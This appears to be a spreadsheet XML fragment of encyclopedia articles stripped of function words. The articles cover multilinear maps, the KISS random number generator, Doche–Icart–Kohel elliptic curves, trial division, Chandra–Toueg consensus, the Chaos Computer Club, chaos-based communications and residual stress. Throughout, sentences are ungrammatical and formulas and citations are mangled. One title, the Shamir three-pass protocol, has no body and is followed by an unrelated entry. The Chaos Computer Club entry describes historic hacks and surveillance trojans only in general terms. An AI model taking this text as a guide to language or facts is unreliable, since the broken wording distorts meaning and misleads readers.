generalizations multilinear maps known graded-encoding systems, since allow {\displaystyle applied partially: instead applied {\displaystyle values once, would produce value target {\displaystyle g_{t}} possible apply {\displaystyle values, generates values intermediate target sets. example, {\displaystyle n=3} possible {\displaystyle y=e(g_{2},g_{3})\in g_{t_{2}}} {\displaystyle e(g_{1},y)\in g_{t}} three main candidates ggh13, based ideals polynomial rings; clt13, based approximate problem works integers, hence, supposed easier understand ggh13 multilinear map; ggh15, based graphs. references</t>
  </si>
  <si>
    <t>KISS (algorithm)</t>
  </si>
  <si>
    <t>kiss (keep simple stupid) family pseudorandom number generators introduced george marsaglia. starting 1998 marsaglia posted various newsgroups including sci.math, comp.lang.c, comp.lang.fortran sci.stat.math several versions generators. kiss generators combine three four independent random number generators view improving quality randomness. kiss generators produce 32-bit 64-bit random integers, random floating-point numbers constructed desired. original 1993 generator based combination linear congruential generator linear feedback shift-register generators. period 295, good speed good statistical properties; however, fails linearcomplexity test crush bigcrush tests testu01 suite. newer version 1999 based linear congruential generator, 3-shift linear feedback shift-register multiply-with-carry generators. 10–20% slower 1993 version larger period 2123 passes tests testu01. 2009 marsaglia presented version based 64-bit integers (appropriate 64-bit processors) combines multiply-with-carry generator, xorshift generator linear congruential generator. period around 2250 (around 1075). references further reading bucklew, james (2013). "1.1 uniform generators". introduction rare event simulation. springer. 1–8. isbn 978-1-4757-4078-3. robert, christian; george casella (2013). "2.1.2 kiss generator". monte carlo statistical methods. springer. 39–43. isbn 978-1-4757-3071-5. rose, gregory (2017). "kiss: simple". cryptography communications. 123–137. doi:10.1007/s12095-017-0225-x. issn 1936-2447.</t>
  </si>
  <si>
    <t>Tripling-oriented Doche–Icart–Kohel curve</t>
  </si>
  <si>
    <t>tripling-oriented doche–icart–kohel curve form elliptic curve used lately cryptography; particular type weierstrass curve. certain conditions operations, adding, doubling tripling points, faster compute using form. tripling oriented doche–icart–kohel curve, often called abbreviation 3dik introduced christophe doche, thomas icart, david kohel definition {\displaystyle field characteristic different form elliptic curve tripling oriented doche–icart–kohel form defined equation: {\displaystyle t_{a}\ y^{2}=x^{3}+3a(x+1)^{2}} {\displaystyle a\in general point {\displaystyle t_{a}} affine coordinates {\displaystyle (x,y)} "point infinity" represents neutral element group written projective coordinates (0:1:0). negation point respect neutral element −y). group consider elliptic curve tripling-oriented doche-icart-kohel form affine coordinates: {\displaystyle t_{a}:\quad y^{2}=x^{3}+3a(x+1)^{2},\qquad a\neq 0,{\tfrac {9}{4}}.} forms elliptic curves, possible define "operations" points, adding points, doubling (see also group law). following sections formulas add, negate doubling points given. addition doubling formulas often used operations: given point elliptic curve possible compute [n]p, integer, using addition doubling; computing multiples points important elliptic curve cryptography lenstra elliptic curve factorization. addition given {\displaystyle p_{1}=(x_{1},y_{1})} {\displaystyle p_{2}=(x_{2},y_{2})} {\displaystyle t_{a}} point {\displaystyle p_{3}=(x_{3},y_{3})=p_{1}+p_{2}} coordinates: {\displaystyle {\begin{aligned}x_{3}&amp;={\frac {1}{(x_{2}-x_{1})^{2}}}\left\{-x_{1}^{3}+(x_{2}-3a)x_{1}^{2}+(x_{2}^{2}+6ax_{2})x_{1}+(y_{1}^{2}-2y_{2}y_{1}+(-x_{2}^{3}-3ax_{2}^{2}+y_{2}^{2}))\right\}\\y_{3}&amp;={\frac {1}{(x_{2}-x_{1})^{3}}}\left\{(-y_{1}+2y_{2})x_{1}^{3}+(-3ay_{1}-3y_{2}x_{2}+3ay_{2})x_{1}^{2}+(3x_{2}^{2}y_{1}+6ax_{2}y_{1}-6ay_{2}x_{2})x_{1}\right.\\&amp;\qquad \qquad \qquad \qquad \left.+(y_{1}^{3}-3y_{2}y_{1}^{2}+(-2x_{2}^{3}-3ax_{2}^{2}+3y_{2}^{2})y_{1}+(y_{2}x_{2}^{3}+3ay_{2}x_{2}^{2}-y_{2}^{3}))\right\}\end{aligned}}} doubling given point {\displaystyle p_{1}=(x_{1},y_{1})} {\displaystyle t_{a}} point {\displaystyle p_{3}=(x_{3},y_{3})=2p_{1}} coordinates: {\displaystyle {\begin{aligned}x_{3}&amp;={\frac {9}{4y_{1}^{2}x_{1}^{4}}}+{\frac {9}{y_{1}^{2}ax_{1}^{3}}}+\left({\frac {9}{y_{1}^{2}a^{2}}}+{\frac {9}{y_{1}^{2}a}}\right)x_{1}^{2}+\left({\frac {18}{y_{1}^{2}a^{2}}}-2\right)x_{1}+{\frac {9}{y_{1}^{2}a^{2}-3a}}\\y_{3}&amp;=-{\frac {27}{8y_{1}^{3}x_{1}^{6}}}-{\frac {81}{4y_{1}^{3}ax_{1}^{5}}}+\left(-{\frac {81}{2y_{1}^{3}a^{2}}}-{\frac {81}{4y_{1}^{3}a}}\right)x_{1}^{4}+\left(-{\frac {27}{y_{1}^{3}a^{3}}}-{\frac {81}{y_{1}^{3}a^{2}}}+{\frac {9}{2y_{1}}}\right)x_{1}^{3}+\left(-{\frac {81}{y_{1}^{3}a^{3}}}-{\frac {81}{2y_{1}^{3}}}a^{2}+{\frac {27}{2y_{1}a}}\right)x_{1}^{2}\\&amp;\qquad \qquad \qquad \qquad +\left(-{\frac {81}{y_{1}^{3}a^{3}}}+{\frac {9}{y_{1}a^{2}}}+{\frac {9}{y_{1}a}}\right)x_{1}+\left(-{\frac {27}{y_{1}^{3}a^{3}}}+{\frac {9}{y_{1}a^{2}}}-y_{1}\right)\end{aligned}}} negation given point {\displaystyle p_{1}=(x_{1},y_{1})} {\displaystyle t_{a}} negation respect neutral element {\displaystyle (0:1:0)} {\displaystyle -p_{1}=(x_{1},-y_{1})} there also formulas given tripling-oriented doche–icart–kohel curves fast tripling operation mixed-addition. jacobian coordinates computing curves points usually represented jacobian coordinates (jn): point jacobian coordinates form {\displaystyle p=(x:y:z:z^{2})} moreover: {\displaystyle p=(x:y:z:z^{2})=(\lambda ^{2}x:\lambda ^{3}y:\lambda z:\lambda ^{2}z^{2}),} {\displaystyle \lambda this means, example, point {\displaystyle p=(x:y:z:z^{2})} point {\displaystyle q=(4x:8y:2z:4z^{2})} (for {\displaystyle \lambda actually same. affine point {\displaystyle p=(x,y)} {\displaystyle t_{a}} written jacobian coordinates {\displaystyle p=(x:y:z:z^{2})} {\displaystyle x=x/z^{2}} {\displaystyle y=y/z^{3}} way, equation {\displaystyle t_{a}} becomes: {\displaystyle t_{a}\ y^{2}=x^{3}+3az^{2}(x+z^{2})^{2}.} term {\displaystyle z^{2}} point curve makes mixed addition (that addition points different systems coordinates) efficient. neutral element jacobian coordinates {\displaystyle (1:1:0:0)} algorithms examples addition following algorithm represents points {\displaystyle p_{1}} {\displaystyle p_{2}} elliptic curve tripling-oriented doche-icart-kohel form. result point {\displaystyle p_{3}=(x_{3},y_{3},z_{3},zz_{3})} assumed {\displaystyle z_{2}=1} {\displaystyle a_{3}=3a} cost implementation 1*a3 10add 1*4, indicates multiplications, squarings, indicates multiplication constant represents number additions required. {\displaystyle a=x_{2}zz_{1}} {\displaystyle b=y_{2}zz_{1}z_{1}} {\displaystyle c=x_{1}-a} {\displaystyle d=2(y_{1}-b)} {\displaystyle f=c^{2}} {\displaystyle f_{4}=4f} {\displaystyle z_{3}=(z_{1}+c)^{2}-zz_{1}-f} {\displaystyle e={z_{3}}^{2}} {\displaystyle g=cf_{4}} {\displaystyle h=af_{4}} {\displaystyle x_{3}=d^{2}-g-2h-a_{3}e} {\displaystyle y_{3}=d(h-x_{3})-2bg} {\displaystyle zz_{3}=e} example {\displaystyle p_{1}=(1,{\sqrt {13}})} {\displaystyle p_{2}=(0,{\sqrt {3}})} affine points elliptic curve {\displaystyle \mathbb {\displaystyle y^{2}=x^{3}+3(x+1)^{2}} then: {\displaystyle a=x_{2}zz_{1}=0} {\displaystyle b=y_{2}zz_{1}z_{1}={\sqrt {3}}} {\displaystyle c=x_{1}-a=1} {\displaystyle d=2(y_{1}-b)=2({\sqrt {13}}-{\sqrt {3}})} {\displaystyle f=c^{2}=1} {\displaystyle f_{4}=4f=4} {\displaystyle z_{3}=(z_{1}+c)^{2}-zz_{1}-f=2} {\displaystyle e={z_{3}}^{2}=4} {\displaystyle g=cf_{4}=4} {\displaystyle h=af_{4}=0} {\displaystyle x_{3}=d^{2}-g-2h-a_{3}e=48-8{\sqrt {39}}} {\displaystyle y_{3}=d(h-x_{3})-2bg=296{\sqrt {3}}-144{\sqrt {13}}} {\displaystyle zz_{3}=e=4} notice case {\displaystyle z_{1}=z_{2}=1} resulting point {\displaystyle p_{3}=(x_{3},y_{3},z_{3},zz_{3})=(48-8{\sqrt {39}},296{\sqrt {3}}-144{\sqrt {13}},2,4)} affine coordinates {\displaystyle p_{3}=(12-2{\sqrt {39}},37{\sqrt {3}}-18{\sqrt {13}})} doubling following algorithm represents doubling point {\displaystyle p_{1}} elliptic curve tripling-oriented doche-icart-kohel form. assumed {\displaystyle a_{3}=3a} {\displaystyle a_{2}=2a} cost implementation 1*a2 1*a3 12add 1*8; represents multiplications, squarings, indicates multiplications constants respectively, indicates additions. {\displaystyle a={x_{1}}^{2}} {\displaystyle b=a_{2}zz_{1}(x_{1}+zz_{1})} {\displaystyle c=3(a+b)} {\displaystyle d={y_{1}}^{2}} {\displaystyle e=d^{2}} {\displaystyle z_{3}=(y_{1}+z_{1})^{2}-d-zz_{1}} {\displaystyle zz_{3}=z_{3}^{2}} {\displaystyle f=2((x_{1}+d)^{2}-a-e)} {\displaystyle x_{3}=c^{2}-a_{3}zz_{3}-2f} {\displaystyle y_{3}=c(f-x_{3})-8e} example {\displaystyle p_{1}=(0,{\sqrt {3}})} point {\displaystyle y^{2}=x^{3}+3(x+1)^{2}} then: {\displaystyle a={x_{1}}^{2}=0} {\displaystyle b=a_{2}zz_{1}(x_{1}+zz_{1})=2} {\displaystyle c=3(a+b)=6} {\displaystyle d={y_{1}}^{2}=3} {\displaystyle e=d^{2}=9} {\displaystyle z_{3}=(y_{1}+z_{1})^{2}-d-zz_{1}=2{\sqrt {3}}} {\displaystyle zz_{3}=z_{3}^{2}=12} {\displaystyle f=2((x_{1}+d)^{2}-a-e)=0} {\displaystyle x_{3}=c^{2}-a_{3}zz_{3}-2f=0} {\displaystyle y_{3}=c(f-x_{3})-8e=-72} notice point affine coordinates, {\displaystyle z_{1}=1} resulting point {\displaystyle p_{3}=(0,-72,2{\sqrt {3}},12)} affine coordinates {\displaystyle p_{3}=(0,-{\sqrt {3}})} equivalence weierstrass form elliptic curve birationally equivalent another written weierstrass form. following twisted tripling-oriented doche-icart-kohel curve: {\displaystyle t_{a,\lambda }:\quad y^{2}=x^{3}+3\lambda a(x+\lambda )^{2}} transformed weierstrass form map: {\displaystyle (x,y)\mapsto (x-\lambda a,y).} {\displaystyle t_{a,\lambda becomes: {\displaystyle y^{2}=x^{3}-3{\lambda }^{2}a(a-2)x+{\lambda }^{3}a(2a^{2}-6a+3)} .conversely, given elliptic curve weierstrass form: {\displaystyle e_{c,d}:\quad y^{2}=x^{3}+cx^{2}+d} possible find "corresponding" tripling-oriented doche–icart–kohel curve, using following relation: {\displaystyle \lambda ={\frac {-3d(a-2)}{a(2a^{2}-6a+3)}}} root polynomial 6912 {\displaystyle 6912a(a-2)^{3}-j(4a-9),} 6912 {\displaystyle j={\frac {6912c^{3}}{4c^{3}+27d^{2}}}} j-invariant elliptic curve {\displaystyle e_{c,d}} notice case given birational equivalence, isomorphism curves. internal link informations running-time required specific case, table costs operations elliptic curves notes external links http://hyperelliptic.org/efd/g1p/index.html references christophe doche; thomas icart david kohel (2006). efficient scalar multiplication isogeny decompositions (pdf). appeared 2006, part lncs (lecture series computer science) volume number 3958. springer verlag. 285–352. daniel bernstein, tanja lange (2007). analysis optimization elliptic-curve single-scalar multiplication (pdf). appeared g.l. mullen, panario, i.e. shparlinski (eds.), finite fields applications (proceedings international conference, fq8, melbourne, australia, july 9–13, 2007). mathematics subject classification. d.j.bernstein, p.birkner, t.lange, c.peters (2007). optimizing double-base elliptic-curve single-scalar multiplication (pdf). appeared srinathan, pandu rangan, yung (eds.), proceedings international conference cryptology india: progress cryptology (indocrypt 2007) 9–13 december 2007, chennai, india. springer.{{cite book}}: maint: multiple names: authors list (link) http://hyperelliptic.org/efd/g1p/auto-3dik-standard.html</t>
  </si>
  <si>
    <t>Trial division</t>
  </si>
  <si>
    <t>trial division laborious easiest understand integer factorization algorithms. essential idea behind trial division tests integer integer factored, divided number turn less example, integer numbers divide selecting largest powers primes list gives trial division first described fibonacci book liber abaci (1202). method given integer refers "the integer factored"), trial division consists systematically testing whether divisible smaller number. clearly, worthwhile test candidate factors less order upwards arbitrary likely divisible three, with ordering, point testing divisibility four number already determined divisible two, three multiple three, etc. therefore, effort reduced selecting prime numbers candidate factors. furthermore, trial factors need {\displaystyle \scriptstyle {\sqrt {n}}} because, divisible number smaller would detected earlier divisible prime factor definite bound prime factors possible. suppose i'th prime, etc. then last prime number worth testing possible factor equality would mean factor. thus, testing suffices square next prime sufficient. should square root integral, factor perfect square. example trial division algorithm, using successive integers trial factors, follows python): efficient: these versions trial division guaranteed find factor since check possible factors prime number, means trial factors thus, algorithm finds factor only, proof prime. factor found, composite integer. computationally advantageous saying prime whose square exceed divides without remainder, prime. below version (without squaring speed worst case, trial division laborious algorithm. base-2 digit number starts works square root algorithm requires {\displaystyle (2^{n/2})\approx {2^{n/2} \over \left({\frac {n}{2}}\right)\ln trial divisions, {\displaystyle \scriptstyle (x)} denotes prime-counting function, number primes less this take account overhead primality testing obtain prime numbers candidate factors. useful table need large: p(3512) 32749, last prime fits sixteen-bit signed integer p(6542) 65521 unsigned sixteen-bit integers. that would suffice test primality numbers 655372 4,295,098,369. preparing table (usually sieve eratosthenes) would worthwhile many numbers tested. instead variant used without primality testing, simply dividing every number less square root base-2 digit number prime not, take about: {\displaystyle 2^{n/2}} cases, required time grows exponentially digits number. even quite satisfactory method, considering even best-known algorithms exponential time growth. chosen uniformly random integers given length, chance factor chance factor shown positive integers factor factor 1000. thus, confronted arbitrary large worthwhile check divisibility small primes, since 1000 {\displaystyle a=1000} base-2 {\displaystyle n=10} however, many-digit numbers factors small primes require days months factor trial division. cases methods used quadratic sieve general number field sieve (gnfs). because methods also superpolynomial time growth practical limit digits reached quickly. reason, public cryptography, values chosen large prime factors similar size cannot factored publicly known method useful time period available computer system computer cluster supercomputers computer grids. largest cryptography-grade number factored rsa-250, digits number, using gnfs resources several supercomputers. running time 2700 core years. references childs, lindsay (2009). concrete introduction higher algebra. undergraduate texts mathematics (3rd ed.). york, springer-verlag. isbn 978-0-387-74527-5. 1165.00002. crandall, richard; pomerance, carl (2005). prime numbers. computational perspective (2nd ed.). york, springer-verlag. isbn 0-387-25282-7. 1088.11001. external links wikiversity offers lesson prime factorization using trial division python. fast javascript prime factor calculator using trial division. handle numbers trial division java, javascript portuguese)</t>
  </si>
  <si>
    <t>Chandra–Toueg consensus algorithm</t>
  </si>
  <si>
    <t>chandra–toueg consensus algorithm, published tushar deepak chandra toueg 1996, algorithm solving consensus network unreliable processes equipped eventually strong failure detector. failure detector abstract version timeouts; signals process processes crashed. eventually strong failure detector never identifies specific non-faulty process failed initial period confusion, and, time, eventually identifies faulty processes failed (where faulty process process eventually fails crashes non-faulty process never fails). chandra–toueg consensus algorithm assumes number faulty processes, denoted less (i.e. minority), i.e. assumes n/2, total number processes. algorithm algorithm proceeds rounds uses rotating coordinator: round process whose identity given chosen coordinator. each process keeps track current preferred decision value (initially equal input process) last round changed decision value (the value's timestamp). actions carried round are: processes send preference, timestamp) coordinator. coordinator waits receive messages least half processes (including itself). chooses preference value recent timestamp among sent. coordinator sends preference) processes. each process waits receive preference) coordinator, failure detector identify coordinator crashed. first case, sets preference coordinator's preference responds ack(r). second case, sends nack(r) coordinator. coordinator waits receive ack(r) nack(r) majority processes. receives ack(r) majority, sends decide(preference) processes. process receives decide(preference) first time relays decide(preference) processes, decides preference terminates.note algorithm used decide value. correctness problem definition algorithm "solves" consensus problem must ensure following properties: termination: processes decide value; agreement: processes decide value; validity: processes decide value process's input value; assumptions before arguing chandra–toueg consensus algorithm satisfies three properties above, recall algorithm requires processes, faulty. furthermore, note algorithm assumes existence eventually strong failure detector (which accessible used detect crash node). eventually strong failure detector never identifies specific non-faulty correct) process failed, initial period confusion, and, time, eventually identifies faulty processes failed. proof correctness termination holds eventually failure detector stops suspecting non-faulty process eventually becomes coordinator. algorithm terminated occurs round every non-faulty process round waits receive preference responds ack(r). this allows collect enough acknowledgments send decide(preference), causing every process terminate. alternatively, faulty coordinator sends decide processes; processes non-faulty, broadcast decision remaining processes, causing decide terminate. validity follows fact every preference starts process's input; nothing protocol generates preferences. agreement potentially difficult achieve. could possible coordinator, round might send decide message value propagates processes coordinator, later round sends decide message value show occur, observe first coordinator send decide(v), must received ack(r) majority processes; but, then, later coordinator polls majority processes, later majority overlap earlier recent value. coordinators send decide message send value. references chandra toueg. unreliable failure detectors reliable distributed systems. jacm 43(2):225–267, 1996. course notes yale failure detectors.</t>
  </si>
  <si>
    <t>Chaos Computer Club</t>
  </si>
  <si>
    <t>chaos computer club (ccc) europe's largest association hackers 7,700 registered members. founded 1981, association incorporated eingetragener verein germany, local chapters (called erfa-kreise) various cities germany surrounding countries, particularly german-speaking communities. since 1985, chapters switzerland organized independent sister association called chaos computer club schweiz (ccc-ch) instead. describes galactic community life forms, independent age, sex, race societal orientation, strives across borders freedom information…". general, advocates transparency government, freedom information, human right communication. supporting principles hacker ethic, club also fights free universal access computers technological infrastructure well open-source software. spreads entrepreneurial vision refusing capitalist control. characterised "…one influential digital organisations anywhere, centre german digital culture, hacker culture, hacktivism, intersection discussion democratic digital rights".members demonstrated publicized number important information security problems. frequently criticizes legislation products weak information security endanger citizen rights privacy users. notable members regularly function expert witnesses german constitutional court, organize lawsuits campaigns, otherwise influence political process. activities regular events hosts annual chaos communication congress, europe's biggest hacker gathering. when event held hamburg congress center 2013, drew 9,000 guests. 2016 installment, 11,000 guests expected, additional viewers following event live streaming. every four years, chaos communication camp outdoor alternative hackers worldwide. also held, 2009 2013, yearly conference called sigint cologne focused impact digitisation society. sigint conference discontinued 2014. four-day conference gulaschprogrammiernacht karlsruhe 1,500 participants second largest annual event. another yearly event taking place easter weekend easterhegg, workshop oriented events. often uses c-base station located berlin event location function rooms. publications outreach publishes irregular magazine datenschleuder (data slingshot) since 1984. berlin chapter produces monthly radio show called chaosradio picks various technical political topics two-hour talk radio show. program aired local radio station called fritz internet. other programs emerged context chaosradio, including radio programs offered regional chaos groups podcast spin-off pritlove. many chapters participate volunteer project chaos macht schule supports teaching local schools. aims improve technology media literacy pupils, parents, teachers.ccc members present tech companies administrative instances. spokespersons ccc, 1986, andy müller-maguhn, member executive committee icann (internet corporation assigned names numbers) 2000 2002. cryptoparty sensitises introduces people questions data privacy. some local chapters support organize called cryptoparties introduce people basics practical cryptography internet anonymity. history founding founded west berlin september 1981 table previously belonged kommune rooms newspaper tageszeitung holland others anticipation prominent role information technology would play people live communicate. btx-hack became world-famous 1984 drew public attention security flaws german bildschirmtext computer network causing debit 134,000 (equivalent €131,600 2021) hamburg bank favor club. money returned next front press. prior incident, system provider failed react proof security flaw provided ccc, claiming public system safe. bildschirmtext biggest commercially available online system targeted general public region time, heavily advertised german telecommunications agency deutsche bundespost also strove keep up-to-date alternatives market. karl koch 1987, peripherally involved first cyberespionage case make international headlines. group german hackers karl koch, loosely affiliated ccc, arrested breaking government corporate computers, selling operating-system source code soviet kgb. this incident portrayed movie gsm-hack april 1998, successfully demonstrated cloning customer card, breaking comp128 encryption algorithm used time many sims. project blinkenlights 2001, celebrated twentieth birthday interactive light installation dubbed project blinkenlights turned building haus lehrers berlin giant computer screen. follow installation, arcade, created 2002 bibliothèque nationale france. later october 2008 ccc's project blinkenlights went toronto, ontario, canada project stereoscope. schäuble fingerprints march 2008, acquired published fingerprints german minister interior wolfgang schäuble. magazine also included fingerprint film readers could fool fingerprint readers. this done protest biometric data german identity devices e-passports. staatstrojaner affair staatstrojaner (federal trojan horse) computer surveillance program installed secretly suspect's computer, german police uses wiretap internet telephony. this "source wiretapping" feasible wiretap case, since internet telephony programs usually encrypt data leaves computer. federal constitutional court germany ruled police programs telephony wiretapping, purpose, restriction enforced technical legal means. october 2011, published analysis staatstrojaner software. software found ability remote control target computer, capture screenshots, fetch arbitrary extra code. says functionality built direct contradiction ruling constitutional court. addition, number security problems implementation. software controllable internet, commands sent completely unencrypted, checks authentication integrity. this leaves computer surveillance using software vulnerable attack. captured screenshots audio files encrypted, incompetently encryption ineffective. captured data sent proxy server united states, problematic since data temporarily outside german jurisdiction. ccc's findings widely reported german press. this trojan also nicknamed r2-d2 string "c3po-r2d2-poe" found code; another alias 0zapftis ("it's tapped!" bavarian, sardonic reference oktoberfest). according sophos analysis, trojan's behavior matches described confidential memo german landeskriminalamt software firm called digitask; memo leaked wikileaks 2008. among correlations dropper's file name scuinst.exe, short skype capture unit installer. 64-bit windows version installs digitally signed driver, signed non-existing certificate authority "goose cert". digitask later admitted selling software governments.the federal ministry interior released statement denied r2-d2 used federal criminal police office (bka); statement however eliminate possibility used state-level german police forces. previously announced however 2007) somewhat similar trojan software inspect computer's hard drive. domscheit-berg affair former wikileaks spokesman daniel domscheit-berg expelled national (but berlin chapter) august 2011. this decision revoked february 2012. result role expulsion, board member andy müller-maguhn reelected another term. phone authentication systems repeatedly warned phone users weakness biometric identification wake 2008 schäuble fingerprints affair. "hacker ethics" includes "protect people data", also "computers change life better". club regards privacy individual right: discourage people sharing storing personal information phones, advocates better privacy protection, specific browsing sharing techniques users. apple touchid from photograph user's fingerprint glass surface, using "easy everyday means", biometrics hacking team able unlock iphone samsung iris recognition samsung galaxy s8's iris recognition system claims "one safest ways keep phone locked contents private" "patterns irises unique virtually impossible replicate", quoted official samsung content. however, cases, using high resolution photograph phone owner's iris lens, claimed able trick authentication system. fake chaos computer club france chaos computer club france (cccf) fake hacker organisation created 1989 lyon (france) jean-bernard condat, command jean-luc delacour, agent direction surveillance territoire governmental agency. primary goal cccf watch gather information french hacker community, identifying hackers could harm country. journalist jean guisnel said organization also worked french national gendarmerie. cccf electronic magazine called chaos digest (chaosd). between january 1993 august 1993, seventy-three issues published (issn 1244-4901). also (film) c-base chaos communication congress chaosdorf, local chapter chaos computer club düsseldorf datenschleuder digitalcourage digital identity hacker culture information privacy netzpolitik.org project blinkenlights security hacker tron (hacker) holland foundation references further reading chaos computer club hackers 'have conscience', news, 2011-02-11 external links official website events blog chaosradio podcast network</t>
  </si>
  <si>
    <t>Shamir three-pass protocol</t>
  </si>
  <si>
    <t>Chaos communications</t>
  </si>
  <si>
    <t>chaos communications application chaos theory aimed provide security transmission information performed telecommunications technologies. secure communications, understand contents message transmitted inaccessible possible eavesdroppers. chaos communications security (i.e., privacy) based complex dynamic behaviors provided chaotic systems. some properties chaotic dynamics, complex behaviour, noise-like dynamics (pseudorandom noise) spread spectrum, used encode data. hand, chaos deterministic phenomenon, possible decode data using determinism. practice, implementations chaos communications devices resort chaotic phenomena: synchronization chaos, control chaos. implement chaos communications using properties chaos, chaotic oscillators required transmitter master) receiver slave). transmitter, message added onto chaotic signal then, message masked chaotic signal. carries information, chaotic signal also called chaotic carrier. synchronizing oscillators similar synchronizing random neural nets neural cryptography. when chaos synchronization used, basic scheme communications device (cuomo oppenheim 1993) made identical chaotic oscillators. used transmitter, receiver. they connected configuration transmitter drives receiver identical synchronization chaos oscillators achieved. purpose transmission information, transmitter, message added small perturbation chaotic signal drives receiver. way, message transmitted masked chaotic signal. when receiver synchronizes transmitter, message decoded subtraction signal sent transmitter copy generated receiver means synchronization chaos mechanism. this works because, whilst transmitter output contains chaotic carrier plus message, receiver output made copy chaotic carrier without message. optical chaos communications chaos communications success optical communications. articles cuomo, kevin oppenheim, alan (1993-07-05). "circuit implementation synchronized chaos applications communications". physical review letters. american physical society (aps). (1): 65–68. doi:10.1103/physrevlett.71.65. issn 0031-9007.</t>
  </si>
  <si>
    <t>Chaos machine</t>
  </si>
  <si>
    <t>mathematics, chaos machine class algorithms constructed base chaos theory (mainly deterministic chaos) produce pseudo-random oracle. represents idea creating universal scheme modular design customizable parameters, applied wherever randomness sensitiveness needed.theoretical model published early 2015 maciej czyzewski. designed specifically combine benefits hash function pseudo-random function. however, used implement many cryptographic primitives, including cryptographic hashes, message authentication codes randomness extractors. also merkle–damgård construction sponge function external links libchaos implemented chaos machines official paper published iacr references</t>
  </si>
  <si>
    <t>Residual stress</t>
  </si>
  <si>
    <t>materials science solid mechanics, residual stresses stresses remain solid material original cause stresses removed. residual stress desirable undesirable. example, laser peening imparts deep beneficial compressive residual stresses metal components turbine engine blades, used toughened glass allow large, thin, crack- scratch-resistant glass displays smartphones. however, unintended residual stress designed structure cause fail prematurely. residual stresses result variety mechanisms including inelastic (plastic) deformations, temperature gradients (during thermal cycle) structural changes (phase transformation). heat welding cause localized expansion, taken welding either molten metal placement parts welded. when finished weldment cools, areas cool contract others, leaving residual stresses. another example occurs semiconductor fabrication microsystem fabrication thin film materials different thermal crystalline properties deposited sequentially different process conditions. stress variation stack thin film materials complex vary compressive tensile stresses layer layer. applications while uncontrolled residual stresses undesirable, designs rely them. particular, brittle materials toughened including compressive residual stress, case toughened glass pre-stressed concrete. predominant mechanism failure brittle materials brittle fracture, begins initial crack formation. when external tensile stress applied material, crack tips concentrate stress, increasing local tensile stresses experienced crack tips greater extent average stress bulk material. this causes initial crack enlarge quickly (propagate) surrounding material overwhelmed stress concentration, leading fracture. material compressive residual stress helps prevent brittle fracture initial crack formed compressive (negative tensile) stress. cause brittle fracture crack propagation initial crack, external tensile stress must overcome compressive residual stress crack tips experience sufficient tensile stress propagate. manufacture swords utilises gradient martensite formation produce particularly hard edges (notably katana). difference residual stress harder cutting edge softer back sword gives swords characteristic curve. toughened glass, compressive stresses induced surface glass, balanced tensile stresses body glass. residual compressive stress surface, toughened glass resistant cracks, shatter small shards outer surface broken. demonstration effect shown prince rupert's drop, material-science novelty molten glass globule quenched water: because outer surface cools solidifies first, volume cools solidifies, "wants" take smaller volume outer "skin" already defined; puts much volume tension, pulling "skin" putting "skin" compression. result, solid globule extremely tough, able hammer, long tail broken, balance forces upset, causing entire piece shatter violently. certain types barrels made tubes forced together, inner tube compressed outer tube stretches, preventing cracks opening rifling fired. premature failure castings also large residual stresses uneven cooling. residual stress often cause premature failure critical components, probably factor collapse silver bridge west virginia, united states december 1967. eyebar links castings showed high levels residual stress, eyebar, encouraged crack growth. when crack reached critical size, grew catastrophically, moment, whole structure started fail chain reaction. because structure failed less minute, drivers passengers cars bridge time killed suspended roadway fell river below. compressive residual stress common methods induce compressive residual stress shot peening surfaces high frequency impact treatment weld toes. depth compressive residual stress varies depending method. both methods increase lifetime constructions significantly. creation residual stress there techniques used create uniform residual stress beam. example, four point bend allows inserting residual stress applying load beam using cylinders. measurement techniques overview there many techniques used measure residual stresses, broadly categorised destructive, semi-destructive non-destructive techniques. selection technique depends information required nature measurement specimen. factors include depth/penetration measurement (surface through-thickness), length scale measured (macroscopic, mesoscopic microscopic), resolution information required, also composition geometry location specimen. additionally, techniques need performed specialised laboratory facilities, meaning "on-site" measurements possible techniques. destructive techniques destructive techniques result large irreparable structural change specimen, meaning either specimen cannot returned service mock-up spare must used. these techniques function using "strain release" principle; cutting measurement specimen relax residual stresses measuring deformed shape. deformations usually elastic, exploitable linear relationship magnitude deformation magnitude released residual stress. destructive techniques include: contour method measures residual stress plane section specimen, uniaxial direction normal surface specimen wire edm. slitting (crack compliance) measures residual stress thickness specimen, normal "slit". block removal/splitting/layering sachs' boring semi-destructive techniques similarly destructive techniques, also function using "strain release" principle. however, remove small amount material, leaving overall integrity structure intact. these include: deep hole drilling measures residual stresses thickness component relaxing stresses "core" surrounding small diameter drilled hole. centre hole drilling measures near-surface residual stresses strain release corresponding small shallow drilled hole strain gauge rosette. centre hole drilling appropriate depth. alternatively, blind hole drilling used thin parts. center hole drilling also performed field on-site testing. ring core similar centre hole drilling, greater penetration, cutting taking place around strain gauge rosette rather centre. non-destructive techniques non-destructive techniques measure effects relationships residual stresses action crystallographic properties measured material. some work measuring diffraction high frequency electromagnetic radiation atomic lattice spacing (which deformed stress) relative stress-free sample. ultrasonic magnetic techniques exploit acoustic ferromagnetic properties materials perform relative measurements residual stress. non-destructive techniques include: electromagnetic a.k.a. estress used wide range sample dimensions materials, accuracy neutron diffraction. portable systems available estress system, used on-site measurements permanently installed continuous monitoring. speed measurement 1-10 seconds location. neutron diffraction proven technique measure through-thickness requires neutron source (like nuclear reactor). synchrotron diffraction requires synchrotron provide similarly useful data estress neutron diffraction methods. x-ray diffraction limited surface technique penetration hundred microns only. ultrasonic experimental process still works. magnetic used limited sample dimensions. relief residual stress when undesired residual stress present prior metalworking operations, amount residual stress reduced using several methods. these methods classified thermal mechanical nonthermal) methods. methods involve processing part stress relieved whole. thermal method thermal method involves changing temperature entire part uniformly, either heating cooling. when parts heated stress relief, process also known stress relief bake. cooling parts stress relief known cryogenic stress relief relatively uncommon. stress relief bake most metals, heated, experience reduction yield strength. material's yield strength sufficiently lowered heating, locations within material experienced residual stresses greater yield strength heated state) would yield deform. this leaves material residual stresses high yield strength material heated state. stress relief bake confused annealing tempering, heat treatments increase ductility metal. although processes also involve heating material high temperatures reduce residual stresses, also involve change metallurgical properties, undesired. certain materials alloy steel, care must taken stress relief bake exceed temperature material achieves maximum hardness (see tempering alloy steels). cryogenic stress relief cryogenic stress relief involves placing material (usually steel) cryogenic environment liquid nitrogen. process, material stress relieved cooled cryogenic temperature long period, slowly brought back room temperature. nonthermal methods mechanical methods relieve undesirable surface tensile stresses replace beneficial compressive residual stresses include shot peening laser peening. each works surface material media: shot peening typically uses metal glass material; laser peening uses high intensity beams light induce shock wave propagates deep material. also autofrettage shot peening laser peening plasticity 